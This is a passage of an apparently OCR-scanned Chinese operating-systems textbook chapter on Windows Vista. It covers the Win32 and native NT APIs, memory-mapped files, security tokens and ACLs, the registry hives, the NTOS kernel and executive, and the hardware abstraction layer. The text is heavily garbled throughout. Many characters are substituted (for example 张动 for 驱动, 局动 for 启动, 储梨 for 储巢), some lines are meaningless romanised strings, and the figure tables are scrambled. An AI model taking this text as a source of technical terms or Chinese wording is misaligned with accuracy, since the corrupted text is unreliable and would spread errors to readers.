被 进程 共享 ， 避 人 免 了 当 进 程 频繁 局 动 和 停止 时 来 不 断 重建 。 设 备 文 件 
和 经 浓 使 用 的 张 动 程序 会 被 给 予 永久 性 名 字 ， 并 且 给 予 特殊 索引 和 点 
持久 属性 ， 这 些 索 引 季 点 保存 在 UNIX 的 /dev 目 未 下 。 


我 们 将 在 下 一 节 中 描 叙 纯 NT API 的 更 多 特征 ， 讨 论 Win32 APIE 
NT 系统 调用 的 封装 性 。 


11.2.2 ”Win32 应 用 编程 接口 


Win32 函 数 调用 统称 为 Win32 API 接 口 。 这 些 接口 已 经 被 公布 并 且 
详细 地 写 在 了 文档 上 。 这 些 接口 在 调用 的 时 候 采 用 库 文件 链接 流程 : 
通过 封装 来 完成 原始 NT 系统 调用 ， 有 些 时 候 也 会 在 用 户 态 下 工作 。 虽 
然 原始 API 没 有 公布 ， 但 是 这 些 API 的 功能 可 以 通过 公布 的 Win32 API 
来 调用 实现 。 随 着 新 的 Windows 和 版 本 的 更 新 ， 更 多 的 API 函 数 相应 增 
加 ， 但 是 原先 存在 的 API 调 用 确 很 少 改变 ， 即 使 Windows 进 行 了 升级 。 


图 11-10 表 示 出 各 种 级 别 的 Win32 API 调 用 以 及 它们 封装 的 原始 API 
调用 。 最 有 趣 的 部 分 是 关于 图 上 令 人 乏味 的 上 映射。 许多 低级 别 的 
Win32 函 数 有 相对 应 的 原始 NT 函数 ， 这 一 点 都 不 奇怪 ， 因 为 Win32 束 
是 为 原始 NT API 设 计 的 。 在 许多 例子 中 ，Win32 函 数 层 必须 利用 
Win32 的 参数 传递 给 NT 内 核 男 数 。 例 如 ， 规 范 路 径 名 并 且 映 射 到 NT 内 
核 路 径 ， 包 括 特殊 的 MS-DOS 设 备 (如 LPT:) 。 当 创建 进程 和 线程 
时 ， 使 用 的 Win32 API 画 数 必须 通知 Win32 子 系统 进程 csrss.exe， 告 知 
它 有 新 的 进程 和 线程 需要 它 来 监督 ， 就 像 我 们 在 11.4 节 里 描述 的 那 
样 。 


一 些 Win32 调 用 使 用 路 径 名 ， 然 而 相关 的 NT 内 核 调 用 使 用 句柄 。 
所 以 这 些 封装 流程 包括 打开 文件 ， 调 用 NT 内 核 ， 最 后 关闭 句柄 。 封 装 


流程 同时 包括 把 Win32 API 从 ANSI 编 码 变 成 Unicode 编 码 。 在 图 11-10 
的 Win32 画 数 里 使 用 字符 串 作 参数 的 实际 上 古 两 套 API， 例 如 参数 
CreateProcessW 和 CreateProcessA。 当 这 些 参 数 要 传递 到 下 一 个 API 
上 时， 这些 字 符 串 必须 翻译 成 Unicode 编 码 ， 因 为 NT 内 核 调 用 只 认识 


Unicode ° 


本 地 NT API 调 用 


NtAllocate VirtualMemory 


11-10 Win32 API 调 用 以 及 它们 所 包含 的 本 地 NT API 调 用 示例 


因为 已 经 存在 的 Win32 接 口 很 少 随 着 操作 系统 的 改变 而 改变 ， 所 
以 从 理论 上 说 能 在 前 一 个 版 本 系统 上 运行 的 程序 也 能 正常 地 在 新 版 本 
的 系统 上 运行 。 可 在 实际 情况 中 ， 依 然 经 常 存 在 新 系统 的 兼容 性 问 


题 。Windows 太 复杂 了 以 至 于 有 些 表 面 上 不 合 逻 辑 的 改动 会 导致 应 用 
程序 运行 失败 。 应 用 程序 本 身 也 有 问题 ， 例 如 ， 它 们 也 经 稼 做 细致 的 
操作 系统 版 本 检查 或 者 本 喘 束 有 湾 在 的 问题 只 不 过 十 在 新 系统 上 骏 露 
出 来 了 。 人 然而 ， 微 软 依旧 尽力 在 每 个 版 本 上 测试 不 同 的 兼容 性 问题 ， 
并 且 力 图 提供 特定 的 解决 办 法 。 


Windows 支 持 两 种 特殊 环境 ， 一 种 叫 WOW 。WOW32 通 过 映射 16 
位 字符 串 到 32 人 位， 来 在 32 位 x86 系 统 用 16 位 Windows 3.x 应 用 程序 。 同 
样 ，WOW64 人 允许 32 位 的 程序 在 x64 染 构 的 系统 上 运行 。 


Windows API 体 系 不 同 于 UNIX 体 系 。 对 于 后 者 来 说 ， 操 作 系 统 函 
数 很 简单 ， 只 有 很 少 的 参数 以 及 很 少 的 方法 来 执行 同样 的 操作 ， 从 而 


可 以 有 很 多 途径 来 完成 同样 的 操作 。Win32 提 供 了 非常 广泛 的 接口 和 
参数 ， 各 名 能 通过 三 四 种 方法 来 做 同样 的 事情 ， 同 时 把 低级 别 和 高 级 


别 的 函数 混和 到 一 起 ， 例 如 CreateFile 和 CopyFile。 


这 意味 着 Win32 提 供 了 一 组 非常 多 的 接口 ， 但 是 这 也 增加 了 复杂 
度 ， 原 因 是 在 同一 个 API 中 精 糕 的 系统 分 层 以 及 高 低级 别 函 数 的 混 
和 “。 为 了 学 习 操 作 系 统 ， 我 们 仅仅 关注 那些 低级 别 的 函数 封 逆 了 相关 
的 NT 内 核 的 API 的 Win32 API。 


Win32 有 创建 和 管理 进程 和 线程 的 调用 。Win32 也 有 许多 进程 内 部 
通信 的 调用 ， 例 如 创建 、 销 哎 、 互 矿 、 信 和 号、 通信 接口 和 其 他 IPC 实 


HAT BAIN FERRAT Re BALA, (ae 
BRA FP ike AT LA: Bad BEC PR AY Bl i FAR A Say 
上 上。 这样 允许 线程 可 以 使 用 指针 来 读 写 部 分 文件 ， 而 不 必 执 行 在 硬盘 
和 内 存 之 间 具 体 的 读 写 数据 操作 。 通 过 内 存 映射 ， 内 存 系统 可 以 根据 
需求 来 执行 WO 操作 (要 求 分 页 ) 。 


Windows 处 理 内 存 映射 文件 使 用 三 种 完全 不 同 的 手段 。 第 一 种 ， 
它 提 供 允 许 进 程 管 理 它 们 目 己 虚拟 空间 的 接口 ， 包 括 预 留 地 址 范围 为 
以 后 用 。 第 二 种 ，Win32 文 持 一 种 称 作文 件 映射 的 抽象 ， 这 用 来 代替 
可 定位 的 实体 ， 如 文件 《文件 的 映射 在 NT 的 层次 中 称 作 section) 。 通 
常 ， 文 件 映 冉 是 使 用 文件 句柄 来 关联 文件 。 但 有 时 候 也 用 来 指 癌 分 5 
系统 中 的 私有 页 面 。 


第 三 种 方法 十 把 文件 映射 的 视图 映射 到 一 个 进程 的 地 址 空间 。 
Win32 仪 仅 允 许 为 当 前 进程 创建 一 个 视图 ， 但 古 NT 潜 在 的 手段 更 加 通 
用 ， 人 允许 为 任意 你 有 权限 句柄 的 进程 创建 视图 。 和 UNIX 中 的 mmap 相 
比 ， 要 区 分 开创 建文 件 映 射 和 把 文件 映射 到 地 址 空间 的 操作 。 


在 Windows 中 ， 文 件 映射 的 内 核 态 实 体 被 句柄 所 取代 。 束 像 许 多 
句柄 一 样 ， 文 件 映 射 能 够 被 复制 到 其 他 进程 中 去 。 这 些 进 程 中 的 任意 
一 个 能 够 根据 需求 映射 文件 到 自己 的 地 址 空间 中 。 这 对 共享 进程 间 的 


私有 内 存 是 非常 有 用 的 ， 而 且 不 必 再 创建 文件 来 实现 。 在 NT 层 ， 文 件 
的 映射 (sections) 也 和 NT 名 字 空 间 保持 一 致 ， 能 够 通过 文件 名 来 访 
间 。 


对 许多 程序 来 说 ， 一 个 重要 的 领域 是 文件 MO 操作 。 在 Win32 基 本 
视图 中 ， 一 个 文件 仅仅 是 一 组 有 顺序 的 子 市 流 。Win32 提 供 超过 60 种 
调用 来 创建 和 删除 文件 和 目录 、 打 开关 闭 文 件 、 读 写 文 件 、 提 取 设 置 
文件 属性 、 锁 定子 市 流 范 围 以 及 更 多 基础 操作 的 功能 ， 这 些 功 能 基于 
文件 系统 的 组 织 以 及 文件 的 各 目 访 问 权 限 。 


还 有 更 高 级 的 处 理 文件 数据 的 方法 。 除 了 主要 的 文件 流 ， 存 在 
NTFS 文 件 系统 上 的 文件 可 以 拥有 额外 的 文件 流 。 文 件 (甚至 包括 整个 
48) 可 以 被 加 密 。 文 件 可 以 被 压缩 成 为 一 组 相对 稀 玻 的 字 节 流 ， 从 而 
省 磁 表 空间 。 不 同 硬盘 的 文件 系统 的 卷 可 以 通过 使 用 不 同 级 别 的 
RAID 存 储 而 组 织 起 来 。 修 改 文件 或 者 目录 可 以 通过 一 种 直接 通知 的 方 
式 来 实现 ， 或 者 通过 读 NTFS 为 每 个 卷 维 护 的 日 志 来 实现 。 


每 个 文件 系统 的 卷 默认 挂 载 在 NT 的 名 字 空 间 里 ， 根 据 卷 的 名 字 来 
排列 ， 因 此 ， 一 个 文件 \foo\bar 可 以 命名 成 
\Device\HarddiskVolume\foo\bar。 对 于 NTFS 的 卷 来 说 ， 挂 载 点 
(Windows 称 作 再 分 解 点 ) 和 符号 链接 用 来 帮助 组 织 卷 。 


低级 别 的 Windows IO 模式 基本 上 是 异步 的 。 一 旦 一 个 IO 操作 开 
始 ， 系 统 调用 将 允许 线程 对 MO 操作 进行 初始 化 并 且 开 始 IO 操作 © 
Windows 支 持 取消 操作 ， 以 及 一 系列 的 不 同 机 制 来 支持 线程 和 IO 操作 
完成 之 后 的 同步 。Windows 也 人 允许 程序 规定 在 文件 打开 时 IO 操作 必须 
同步 ， 许 多 库 函 数 ， 例 如 C 库 和 许多 Win32 调 用 ， 也 规定 IO 的 同步 已 
支持 兼容 性 或 者 简化 编程 模型 。 在 这 些 情 况 下 ， 执 行 体 会 在 返回 到 用 
户 态 前 和 IO 操作 结束 时 进行 同步 。 


Win32 提 供 的 允 一 些 调 用 是 安全 性 相关 的 。 每 个 线程 将 和 一 个 内 
核对 象 进行 捆绑 ， 称 作 令 牌 (token) ， 这 个 令 牌 提供 关于 该 线程 的 身 
份 和 权限 相关 的 信息 。 每 个 目标 可 以 有 一 个 ACL (访问 权限 控制 列 
表 ) ， 这 个 列表 详细 描述 了 哪 种 用 户 有 权限 访问 并 且 对 其 进行 操作 。 
这 种 方式 通过 了 一 种 细 粒 度 的 安全 机 制 ， 可 以 指定 具体 哪些 用 户 可 以 
或 者 蔡 止 访问 特定 的 对 象 。 这 种 安全 模式 是 可 以 扩展 的 ， 允 许 应 用 程 
序 添加 新 的 安全 规则 ， 例 如 限制 访问 时 间 。 


Win32 的 名 字 空 间 不 同 于 前 面 指 述 的 NT 内 核 名 字 空 间 。NT 内 核 空 
间 仅 仅 只 有 一 部 分 对 Win32 API 函 数 可 见 (即使 整个 NT 名 字 空 间 可 以 
通过 Win32 使 用 特殊 字符 串 来 访问 ， 如 作 .”) 。 在 Win32 中 ， 文 件 访问 
权限 和 驱动 器 号 相关 。NT 目 录 \DosDevices 里 包含 了 对 一 个 从 驱动 器 号 
到 实际 设备 对 象 的 数 个 符号 链接 。 例 如 ，\DosDevices\C: 是 指 回 


\Device\HarddiskVolume1l1。 这 个 目录 同样 也 包含 了 其 他 Win32 设 备 的 链 


接 ， 如 COM1:、LPT1: 和 NUL:( 端 口号 和 打印 端口 ， 以 及 非常 重要 的 空 
设备 ) 。\DosDevices 是 一 个 真正 指向 \?? 的 链接 ， 这 样 有 利于 提高 效 

率 。 另 外 一 个 NT 文件 夹 ，\BaseNamedObjects 用 来 存储 各 种 各 样 的 内 核 
对 象 ， 这 些 文件 可 以 通过 Win32 API 来 访问 。 这 些 对 象 包括 用 来 同步 
的 对 象 ， 如 信号、 共享 内 存 、 定 时 器 以 及 通信 端口 ，MS-DOS 和 设备 
名 称 。 


对 于 底层 系统 接口 ， 我 们 额外 说 一 下 ，Win32 API 也 文 持 许多 GUI 
操作 ， 包 括 系统 所 有 图 形 接 口 的 调用 。 有 对 窗口 的 创建 、 挫 毁 、 管 理 
和 使 用 的 调用 ， 以 及 支持 菜单 、 工 具 条 、 状 态 栏 、 深 动 条 、 对 话 框 、 
图 标 和 许多 在 屏幕 上 显示 的 元 素 。Win32 还 提供 调用 来 画 几何 图 形 、 
填充 、 使 用 调 色 板 、 人 处 理 文字 以 及 在 屏幕 上 放置 图 标 等 。 也 支持 对 键 
盘 岂 标 和 其 他 输入 设备 的 响应 ， 如 音频 、 打 印 等 其 他 输出 设备 。 


GUI 操 作 直 接 使 用 win32k.sys 张 动 ， 这 个 驱动 使 用 特殊 的 瑟 数 从 用 
户 态 去 访问 内 核 仿 的 接口 。 因 为 这 些 调用 不 包含 NT 操作 系统 中 的 系统 
调用 ， 我 们 将 不 会 详细 讨论 。 


11.2.3. Windowsit HÆ 


名 字 空 间 的 根 在 内 核 中 维护 。 存 储 设备 ， 如 系统 的 卷 ， 附 属于 名 
字 空 间 中 。 因 为 名 字 空 间 会 因为 系统 的 每 次 启动 重新 构建 ， 那 么 系统 
怎么 知道 系统 配置 的 细节 呢 ? 答案 就 是 Windows 会 挂 载 一 种 特殊 的 文件 
系统 (为 小 文件 做 了 优化 ) 到 名 字 空 间 。 这 个 文件 系统 称 作 注 册 表 
(registry) 。 注 册 表 被 组 织 成 了 不 同 的 卷 ， 称 作 储 梨 (hive) 。 每 个 储 
巢 保存 在 一 个 单独 文件 中 〈 在 启动 卷 的 目录 
C:\Windows\system32\config\ F) 。 当 Windows 系 统 启动 时 ， 一 个 叫做 
SYSTEM 的 特殊 储 梨 被 装 入 了 内 存 ， 这 是 由 同样 的 装载 内 核 和 其 他 局 
动 文 件 〈 例 如 位 于 局 动 盘 的 张 动 程序 ) 的 程序 来 完成 。 


Windows 在 系统 储 烛 里面 保存 了 大 量 的 重要 信息 ， 包 括 驱 动 程序 去 
驱使 什么 设备 工作 ， 什 么 软件 进行 初始 化 ， 以 及 什么 变量 来 控制 操作 
系统 的 操作 等 。 这 些 信息 甚至 被 启动 程序 目 己 用 来 决定 哪些 磷 动 程序 
是 用 于 局 动 的 驱动 ， 哪 些 必须 立即 需要 启动 。 这 些 驱 动 包括 操作 系统 
自身 来 识别 文件 系统 和 磁盘 驱动 的 程序 。 


其 他 配置 储 集 用 在 系统 启动 后 ， 描 述 系 统 安装 的 软件 的 信息 ， 特 
别 是 用 户 和 用 户 态 下 安装 在 系统 上 的 COM (Component Object- 
Model)。 本 地 用 户 的 登录 信息 保存 在 SAM (安全 访问 管理 器 ) 中 。 网 
络 用 户 的 信息 保存 在 lsass 服 务 中 ， 和 网 络 服务 器 文件 夹 一 起 ， 用 户 可 


以 通过 上 壕 两 种 配置 拥有 一 个 访问 网 络 的 用 户 名 和 密码 。Windows 
Vista 的 储 梨 列表 在 图 11-11 中 显示 。 


| tik HSC PF 挂 载 名 称 使 用 
SYSTEM HKLM TEM OS 配置 信息 ， 供 内 核 使 用 
HARDWARE | HKLMDWARE 记录 探测 到 的 设备 的 内 存储 梨 
BCD HKLM BCD* 启动 配置 数据 库 
SAM | HKLM 本 地 用 账户 信息 
SECURITY | HKLMURITY lass 的 账号 和 其 他 信息 
DEFAULT HKEY_USERS .DEFAULT | 新 用 户 的 默认 储 梨 
NTUSER.DAT | HKEY_USERS <userid> | 用 户 相关 的 储 梨 ， 保 存在 home 目 录 
SOFTWARE HKLM TWARE COM 注 册 的 应 用 类 
COMPONENTS | HKLM NENTS + aa 的 清单 和 依赖 


图 11-11 Windows Vista 中 的 注册 表 储 策 。HKLM 是 


HKEY LOCAL MACHINE 的 缩写 


在 引入 注册 表 之 前 ，Windows 的 配置 信息 保存 在 大 量 的 ,ini 文件 

里 ， 分 散在 硬盘 的 各 个 地 方 。 注 册 表 则 把 这 些 文 件 集中 存储 ， 使 得 这 
些 文件 可 以 在 系统 启动 的 过 程 中 引用 。 这 对 Windows 热 插 拔 功 能 是 很 重 
要 的 。 但 是 ， 随 着 Windows 的 发 展 ， 注 册 表 已 经 变 得 无 序 。 有 些 关 于 配 
置 的 信息 的 协议 定义 得 很 差 ， 而 且 很 多 应 用 程序 采取 了 特殊 的 方法 。 
许多 用 户 、 应 用 程序 以 及 所 有 驱动 程序 在 运行 时 具有 私有 权限 ， 而 且 
经 常 直 接 更 改 注册 表 的 系统 参数 一 一 有 时 候 会 妨碍 其 他 程序 导致 系统 
不 稳定 。 


注册 表 是 位 于 数据 库 和 文件 系统 之 间 的 一 个 交叉 点 ， 但 是 和 每 一 
个 都 不 像 。 有 上 整 本 描写 注册 表 的 书 (Bom, 1998;Hipson, 2000;Ivens 


1998) 。 有 很 多 公司 开发 了 特殊 的 软件 去 管理 复杂 的 注册 表 。 


regedit 能 够 以 网 形 窗口 的 方式 来 浏览 注册 表 ， 这 个 工具 允许 你 碍 看 
其 中 的 文件 夹 〈 称 作 键 ) 和 数据 项 GREE) 。 微 软 的 新 PowerShell 脚 
本 语言 对 于 思 历 注册 表 的 键 和 值 是 非常 有 用 的 ， 它 把 这 些 键 和 值 以 类 
似 目 如 的 方式 来 看 得 。Procmon 是 一 个 比较 有 趣 的 工具 ， 可 以 从 微软 工 


具 网 站 : www.microsoft.com/technet/sysinternals 中 找到 它 。 


Procmon 监 视 系统 中 所 有 对 注册 表 的 访问 。 有 时 ， 一 些 程序 可 能 会 
重复 访问 同一 个 键 达 数 万 次 之 多 。 


正如 名 字 所 显示 的 那样 ， 注 册 表 编辑 化 允 许 用 户 对 注册 表 进 行 编 
辑 ， 但 是 一 旦 你 这 么 做 惑 必须 非常 小 心 *。 天 很 容易 造成 系统 无 法 引导 
或 损坏 应 用 软件 的 安装 ， 因 此 没有 一 些 专业 技巧 就 不 要 去 修改 它 。 微 
软 承 诡 会 在 以 后 发 布 时 清理 注册 表 ， 但 现在 它 仍 是 庞杂 的 一 扒 一 一 比 
UNIX 保 留 的 配置 信息 复杂 得 多 。 


微软 Windows Vista 已 经 引入 了 一 个 基于 事务 管理 的 内 核 ， 用 来 文 
持 对 跨越 文件 系统 和 广 册 表 操作 的 事务 进行 协调 。 微 软 计划 在 未 来 使 
用 该 功能 以 避免 由 于 软件 非 完全 正确 安装 而 在 系统 目 孙 和 注册 表 储 时 
中 留 下 当时 局 部 状态 信息 所 造成 的 元 数据 论 用 问题 。 


Win32 程 序 员 通 过 函数 调用 可 以 很 方便 地 访问 注册 表 ， 包 括 创建 、 
删除 键 、 查 询 键 值 等 。 如 图 11-12 所 示 。 
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列举 某 不 刍 的 下 级 副 刍 


图 11-12 一 些 使 用 注册 表 的 Win32 API 调 用 


当 系统 关闭 时 ， 大 部 分 的 注册 表 信 息 被 存储 在 硬盘 储 巢 中 。 因 为 
极其 严格 的 完整 性 要 求 使 得 需要 纠正 系统 功能 ， 上 自动 实现 备份 ， 将 元 
数据 冲 写 入 硬盘 以 防止 在 发 生 系统 骨 演 时 所 造成 的 损坏 。 注 册 表 损坏 
需要 重新 安装 系统 上 的 所 有 软件 。 


11.3 ”系统 结构 


前 面 的 章节 从 用 户 态 下 程序 员 写 代码 的 角度 研究 了 Windows Vista 
系统 。 现 在 我 们 将 观察 系统 是 如 何 组 织 的 ， 不 同 的 部 件 承 担 什么 工作 
以 及 它们 彼此 间或 者 和 用 户 程 序 间 是 如 何 配合 的 。 这 是 实现 底层 用 户 
态 代码 的 程序 开发 人 员 所 能 看 见 的 操作 系统 部 分 ， 类 似 于 子 系统 和 本 
地 服务 ， 以 及 提供 给 设备 驱动 程序 开发 者 的 系统 视图 。 


尽管 有 很 多 关于 Windows 使 用 方面 的 书籍 ， 但 很 少 有 书 讲述 它 是 如 
何 工 作 的 。 不 过 ， 查 阅 《Microsoft Windows Internals, 4th ed) 
(Russionvich 和 Solomon，2004) 是 其 中 最 好 的 选择 之 一 。 该 书 描述 的 
虽然 是 Windows XP， 但 大 部 分 的 描述 还 是 准确 的 。 就 内 部 机 制 而 言 ， 
Windows XP 和 Windows Vista 是 非常 相近 的 。 


而 且 ， 微 软 通过 Windows 学 术 计 划 为 大 学 教员 和 学 生 提 供 对 其 有 帮 
助 的 Windows 内 核 信息 。 该 计划 会 发 布 大 部 分 Windows Server 2003 内 核 
源 代码 、Cutler 团 队 的 原始 NT 设计 文档 和 一 大 套 源 自 Windows Internals 
书籍 的 表述 资料 。 另 外 ，Windows 驱 动工 具 也 会 提供 大 量 内 核 工 作 信 
息 ， 因 为 设备 驱动 器 不 仅 使 用 VO 设备 ， 还 需要 使 用 进程 、 线 程 、 虚 拟 
内 存 和 进程 间 的 通信 等 。 


11.3.1 ”操作 系统 结构 


Windows Vista 操 作 系统 包括 很 多 层 ， 如 图 11-6 所 示 。 在 以 下 章节 
我 们 将 研究 操作 系统 中 工作 于 内 核 态 的 最 底 级 层次 。 其 中 心 就 是 NOTS 
内 核 层 自身 ， 当 Windows 启 动 时 由 ntoskrnl.exe 加 载 。NTOS 包 括 两 层 ， 
executive (执行 体 ， 提供 大 部 分 的 服务 ， 另 一 个 较 小 的 层 称 为 内 核 
(kernel) ， 负 责 实现 基础 线程 计划 和 同步 抽象 ， 同 时 也 执行 陷入 句柄 
中 断 以 及 管理 CPU 的 其 他 方面 。 


将 NTOS 分 为 内 核 和 执行 体 体现 了 NT 的 VAX/VMS 根 源 。VMS 操 作 
系统 也 是 由 Cutler 团 队 设计 的 ， 可 分 为 4 个 由 硬件 实施 的 层次 : FAR > 
管理 程序 、 执 行 体 和 内 核 ， 与 VAX 处 理 机 结构 提供 的 4 种 保护 模式 一 
BL o Intel CPU 也 文 持 这 4 种 保护 环 ， 但 是 一 些 早期 的 NT 处 理 机 对 此 不 文 
持 ， 因 此 内 核 和 执行 体 表 现 了 由 软件 实施 的 抽象 ， 同 时 VMS 在 管理 者 
模式 下 提供 的 功能 ， 如 假 脱 机 打印 ，NT 是 作为 用 户 态 服务 提供 的 。 


NT 的 内 核 态 层 如 图 11-13 所 示 。NTOS 的 内 核 层 在 执行 体 层 之 上 ， 
因为 它 实 现 了 从 用 户 态 到 内 核 态 转换 的 陷入 和 中 断 机 制 。 图 11-13 所 示 
的 最 顶层 是 系统 库 ntdll.dl， 它 实际 工作 于 用 户 态 。 系 统 库 包 括 许多 为 
编译 侣 运行 提供 的 支持 功能 以 及 低级 库 ， 类 似 于 UNIX 中 的 libc 。 
Ntdll.dll 也 包括 了 特殊 码 输入 指针 以 支持 内 核 初始 化 线程 、 分 发 异常 和 
用 户 态 的 异步 过 程 调用 (Asynchronous Procedure Calls，APC) 等 。 
为 系统 库 对 内 核 运行 是 必需 的 ， 所 以 每 个 由 NTOS 创 建 的 用 户 态 进程 都 


具有 相同 固定 地 址 描绘 的 ntdl。 当 NTOS 初 始 化 系统 时 ， 会 创建 一 个 局 
部 目标 并 且 记 录 下 内 核 使 用 的 ntdl 输 入 指针 地 址 © 


系统 库 核心 用 户 态 分 派 例 程 (ntdll.d1l) 


NTOS B GEE Se is P TA 


内 核 层 CPU 调度 和 同步 : 线程 、ISRs、DPCs、APCs 


了 驱动， 文件 
系统 ， 卷 管理 
器 ,TCP/IP 栈 ， 
网 络 接 口 ， 图 
形 设 备 ， 所 有 
其 他 设备 
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图 11-13 ”Windows 内 核 态 组 织 结构 


在 NTOS 内 核 和 执行 体 层 之 下 是 称 为 硬件 抽象 层 (Hardware 
Abstraction Layer, HAL) 的 软件 ， 该 软件 对 类 似 于 设备 寄存 器 存 取 和 
DMA 操 作 之 类 的 底层 硬件 信息 进行 抽象 ， 同 时 还 就 BIOS 固 件 是 如 何 表 
述 配置 信息 和 处 理 CPU 必 片上 的 不 同 《如 各 种 中 断 控 制 器 ) 进行 抽 
象 。BIOS 可 以 从 很 多 公司 获得 ， 并 且 被 集成 为 计算 机 母 板 上 的 永久 内 
存 。 


内 核 态 下 男 一 个 主要 部 件 就 是 设备 驱动 器 。Windows 内 核 态 下 任何 
非 NTOS 或 HAL 的 设备 都 会 用 到 设备 张 动 磊 ， 包 撕 文件 系统 、 网 络 协议 


栈 和 其 他 如 防 病毒 程序 、 DRM 软 件 之 类 的 内 核 扩 展 ， 以 及 与 硬件 总 线 
接口 的 管理 物理 设备 驱动 紫 等 。 


WO 和 虚拟 内 存 部 件 协作 加 载 设备 驱动 程序 至 内 核 存储 器 并 将 它们 
连接 到 NTOS 和 HAL 层 。1O 管 理 右 提供 发 现 、 组 织 和 操作 设备 的 接 
口 ， 包 括 安排 加 载 适 当 的 设备 驱动 程序 等 。 大 多 数 管理 设备 和 驱动 句 
的 配置 信息 都 保留 在 注册 表 的 系统 储 和 集中 。LIO 管 理 器 的 即 插 即 用 下 层 
部 件 保留 硬件 储 桌 内 检测 出 的 硬件 信息 ， 该 储 巢 是 保留 在 内 存 中 的 可 
变 储 曲 而 非 存在 于 硬盘 中 ， 系 统 每 次 引导 都 会 重新 创建 。 


以 下 将 详细 介绍 操作 系统 的 不 同 部 件 。 


1. 硬 件 抽象 层 


正如 之 前 发 布 的 基于 NT 的 Windows 系 统一 样 ，Windows Vista 的 目 
标 之 一 是 使 得 操作 系统 在 不 同 的 硬件 平台 之 间 具 有 可 移植 性 。 理 想 情 
况 下 ， 如 果 需 要 在 一 种 新 型 计算 机 系统 中 运行 该 操作 系统 ， 仅 仅 需要 
在 首次 运行 时 使 用 新 机 器 编译 句 重 新 编译 操作 系统 即 可 。 但 实际 上 并 
没有 那么 简单 。 操 作 系统 各 层 有 大 量 部 件 具 有 很 好 的 可 移植 性 (因为 
它们 主要 处 理 文 持 编 程 模式 的 内 部 数据 结构 和 抽象 ， 从 而 文 持 特定 的 
编 成 模式 ) ， 其 他 层 就 必须 处 理 设备 寄存 器 、 中 断 、DMA 以 及 机 器 与 
机 器 间 显 著 不 同 的 其 他 硬件 特征 。 


大 多 数 NTOS 内 核 源 代码 由 C 语 言 编写 而 非 汇编 语言 (x86 中 仪 2% 
是 汇编 语言 ， 比 x64 少 1%) 。 然 而 ， 所 有 这 些 C 语 言 代 码 都 不 能 简单 地 
从 x86 系 统 中 移植 到 一 个 SPARC 系 统 ， 然 后 重新 编译 、 重 新 引导 ， 因 为 
与 不 同 指令 集 无 关 并 且 不 能 被 编译 项 隐藏 的 处 理 机 结构 及 其 硬件 有 很 
多 不 同 。 像 C 这 样 的 语言 难以 抽象 硬件 数据 结构 和 参数 ， 如 页 表 输 入 格 
式 、 物 理 存 储 页 大 小 和 字 长 等 。 所 有 这 些 以 及 大 量 的 特定 人 硬件 的 优化 
即使 不 用 汇编 语言 编写 ， 也 将 不 得 不 手工 处 理 。 


大 型 服务 右 的 内 存 如 何 组 织 或 者 何 种 硬件 同步 基 元 是 可 获得 的 ， 
与 此 相关 的 硬件 细 市 对 系统 较 高 层 都 有 比较 大 的 影响 。 例 如 ，NT 的 虚 
拟 内 存 管 理 融 和 内 核 屋 了 解 涉 及 内 存 和 内 存 位置 的 硬件 细 市 。 在 整个 
系统 中 ，NT 使 用 的 是 比较 和 区 换 同 步 基 元 ， 对 于 没有 这 些 基 元 的 系统 
是 很 难 移植 上 去 的 。 最 后 ， 系 统 对 字 内 的 字 世 分 类 系统 存在 很 多 相关 
性 。 在 所 有 NT 原来 移植 到 的 平台 上 上， 硬件 是 设置 为 小 端 (little- 
endian) 模式 的 。 


除了 以 上 这 些 影响 便携 性 的 较 大 问题 外 ， 不 同 制造 商 的 不 同 母 板 
还 存在 大 量 的 小 问题 。CPU 版 本 的 不 同 会 影响 同步 基 元 的 实现 方式 。 
各 种 文 持 必 片 组 也 会 在 硬件 中 断 的 优先 次 序 、IO 设 备 寄存 器 的 存 取 、 
DMA 转 换 管 理 、 定 时 秀和 实时 时 钟 控制 、 多 处 理 北 同步 、BIOS 设 备 
(如 ACPD 的 工作 等 方面 产生 差异 。 微 软 尝试 通过 最 下 端的 HAL 层 隐藏 
对 这 些 设备 类 型 的 依赖 。HAL 的 工作 就 是 对 这 些 硬件 进行 抽象 ， 隐 藏 


ADERARE ` SCRE Ar RA HC ee EMT o AHAL HZR 
展现 为 NTOS 和 驱动 可 用 的 独立 于 机 器 的 服务 。 


使 用 HAL 服 务 而 不 直接 写 硬件 地 址 ， 驱 动 器 和 内 核 在 与 新 处 理 器 
通信 时 只 需要 较 小 改变 ， 而 且 在 多 数 情 况 下 ， 尽 管 版 本 和 支持 心 片 集 
不 同 但 只 要 有 相同 的 处 理 器 结构 ， 系 统 中 所 有 部 件 均 无 需 修改 就 可 运 


T 


HAL 对 诸如 键 弄 、 鼠 标 、 硬 盘 等 特殊 的 MO 设备 或 内 存 管理 单元 不 
提供 抽象 或 服务 。 这 种 抽象 功能 广泛 应 用 于 整个 内 核 态 的 各 部 件 ， 如 
琳 没 有 HAL， 通 信 时 即使 硬件 间 很 小 的 其 异 也 会 造成 大 量 代码 的 重大 
修改 。HAL 目 映 的 通信 很 侧 单 ， 因 为 所 有 与 机 右 相 天 的 代码 都 集中 在 
一 个 地 方 ， 移 植 的 目标 束 很 容易 确定 ， 即 实现 所 有 的 HAL 服 务 。 很 多 
版 本 中 ， 微 软 部 支持 HAL 扩 展 工具 包 ， 人 允许 系统 制造 着 生产 各 目的 
HAL 从 而 使 得 其 他 内 核 部 件 在 新 系统 中 无 需 更 改 即 可 工作 ， 当 然 这 要 
在 便 件 更 改 不 是 很 大 的 前 所 下 。 


通过 内 存 映射 WO 与 VO 端口 的 对 比 可 以 更 好 地 了 解 硬 件 抽象 层 是 如 
何 工 作 的 。 一 些 机 器 有 内 存 映射 TO， 而 有 的 机 器 有 IO 端口 。 张 动 程序 
是 如 何 编写 的 呢 ? 是 不 是 使 用 内 存 映 射 7O? 无 需 强 制 做 出 选择 ， 只 需 
要 判断 哪 种 方式 使 驱动 程序 可 独立 于 机 器 运行 即 可 。 硬 件 抽象 层 为 驱 
动 程序 编写 者 分 别提 供 了 三 种 读 、 写 设备 寄存 器 的 程序 : 


uc=READ_PORT_UCHAR(port);WRITE_PORT_UCHAR(port, uc); 


us=READ_PORT_USHORT (port) ;WRITE_PORT_USHORT(port, us); 
u1=READ_PORT_ULONG(port) ;WRITE_PORT_ULONG(port, ul); 


这 些 程序 各 目 在 指定 端口 读 、 写 无 符号 8、16、32 位 整数 ， 由 硬件 
抽象 层 决 定 这 是 否 需 要 内 存 映 射 17O。 这 样 ， 驱 动 程序 可 以 在 设备 寄存 
器 实现 方式 有 差异 的 机 器 间 使 用 而 不 需要 修改 。 


